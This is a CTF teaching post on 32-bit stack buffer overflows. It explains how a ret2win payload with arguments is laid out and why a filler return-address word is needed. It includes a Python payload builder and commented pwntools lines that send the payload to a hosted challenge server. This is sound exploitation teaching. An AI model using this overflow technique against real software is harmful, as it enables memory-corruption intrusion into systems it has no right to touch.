OK time to start hacking. Here are today's goals:
pwntools is a Python library that acts as a Swiss army knife for pwning.
If you can run the line from pwn import *
in a Python session, you're good to go.
If not, follow the install instructions at: https://github.com/Gallopsled/pwntools
Our pwndocker instructions also give you a container with pwntools already working.
Here is a random pwntools script from a live CTF problem:
Here is a more useful collection of utilities I find myself using often when hacking:
OK, we get the basic idea of what we need to do, right?
In these problems the coder lets us write more bytes than fit into a fixed-size buffer on the stack, so our input runs past the buffer and over the saved return address.
It looks something like this:
This is the second problem in the zero-to-hero sequence.
Let's solve it together (the video will walk through more). I took the time to host it at: nc 207.154.239.148 11986
TLDR: payload = b"A"*offset + p32(win_ADDR) + p32(mysteryhere) + p32(argument1) + p32(argument2)
(mysteryhere is a filler word that sits where win expects its own return address; read on for why it has to be there.)
Here's the normal calling convention for 32-bit (cdecl): the caller pushes the arguments right to left, then call pushes the return address, so on entry the callee finds its return address at [esp], its first argument at [esp+4] and its second at [esp+8]:
Now suppose you are going to buffer overflow and land in win by overwriting the saved return address:
When you get into a win function through a ret instead of a call, nothing pushes a return address...
BUT the compiled win function still behaves as if the word at [esp] is its return address and its arguments start at [esp+4]...
SO the word right after p32(win) in your payload is swallowed as the fake return address, and all of your real arguments are shifted by one stack slot when hacking in this way.
As pseudo-instructions:
payload = "a"*offset + p32(win) + p32(x) + p32(y) + p32(z)
ret                 ; the overflowed function pops p32(win) into eip; esp now points at p32(x)
                    ; what win sees on entry: [esp] = x ("return address"), [esp+4] = y (arg1), [esp+8] = z (arg2)
                    ; the same layout written out: "aaaa" + p32(x) + p32(y) + p32(z), where the 4 bytes win takes as its return address are whatever you put in x
ret                 ; at the end of .win: pops x into eip
?ret                ; so x decides what happens after win finishes: a junk value like 0xdeadbeef crashes once win has already done its job, a real address keeps executing there
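To make the shifted-by-one layout concrete, here is an added Python example (mine, not the course's own script). It builds the payload from the TLDR line, then models the overflowed function's ret and reports what win finds in its return-address and argument slots. It also builds the common wrong payload that forgets the filler word, so you can see the arguments slide. OFFSET, WIN_ADDR and the two argument values are placeholder assumptions; the real ones come from the binary (crash it with a cyclic pattern for the offset, read win's address from the disassembly). If pwntools is not installed, p32/u32 fall back to struct, which produces identical bytes.

```python
# Added example, not the course's script: ret2win with arguments on 32-bit.
# OFFSET, WIN_ADDR, ARG1, ARG2 below are assumed placeholders, not real values.
import struct

try:
    from pwn import p32, u32          # pwntools, if it is installed
except ImportError:                   # same little-endian encoding without pwntools
    def p32(x):
        return struct.pack("<I", x & 0xFFFFFFFF)

    def u32(b):
        return struct.unpack("<I", b)[0]


def build_payload(offset, win_addr, arg1, arg2, fake_ret=0xDEADBEEF):
    """'A'*offset reaches the saved return address. The word after win lands in the
    slot win treats as *its* return address, so the real arguments start one slot
    later. fake_ret is the 'mysteryhere' word from the TLDR."""
    return b"A" * offset + p32(win_addr) + p32(fake_ret) + p32(arg1) + p32(arg2)


def build_payload_wrong(offset, win_addr, arg1, arg2):
    """The common mistake: no filler word, so win eats arg1 as its return address."""
    return b"A" * offset + p32(win_addr) + p32(arg1) + p32(arg2)


def _word(payload, i):
    """32-bit word at byte index i, or None if the payload ends first (that stack
    slot then holds whatever garbage was already there)."""
    chunk = payload[i:i + 4]
    return u32(chunk) if len(chunk) == 4 else None


def stack_as_win_sees_it(payload, offset):
    """Model the overflowed function's final ret: it pops the word at [esp] (our
    win address) and leaves esp on the next word. win, compiled for cdecl, then
    reads [esp] as its return address, [esp+4] as arg1 and [esp+8] as arg2."""
    esp = offset                      # index of the saved-return-address slot
    popped = _word(payload, esp)      # ret: eip <- [esp]; esp += 4
    esp += 4
    return {
        "eip_after_ret": popped,
        "win_return_addr": _word(payload, esp),      # the 'mysteryhere' slot
        "arg1": _word(payload, esp + 4),
        "arg2": _word(payload, esp + 8),
    }


if __name__ == "__main__":
    OFFSET, WIN_ADDR = 44, 0x08049196              # assumed, not the real values
    payload = build_payload(OFFSET, WIN_ADDR, 0xCAFEBABE, 0xF00DF00D)
    print("correct:", {k: hex(v) for k, v in stack_as_win_sees_it(payload, OFFSET).items()})
    bad = build_payload_wrong(OFFSET, WIN_ADDR, 0xCAFEBABE, 0xF00DF00D)
    print("wrong:  ", stack_as_win_sees_it(bad, OFFSET))
    # To fire it at the hosted challenge (pwntools required; assumes the binary
    # reads the overflowing input from stdin):
    # from pwn import remote
    # io = remote("207.154.239.148", 11986)
    # io.sendline(payload)
    # io.interactive()
```

Run it and compare the two dictionaries: in the correct payload win's return slot holds 0xdeadbeef and arg1/arg2 are what you intended; in the wrong one arg1 has become the return address, arg2 has moved into arg1, and the arg2 slot is leftover stack (None in the model). If win only needs to run once, the crash after its ret does not matter; if you need it to return cleanly, put a real address in the filler slot.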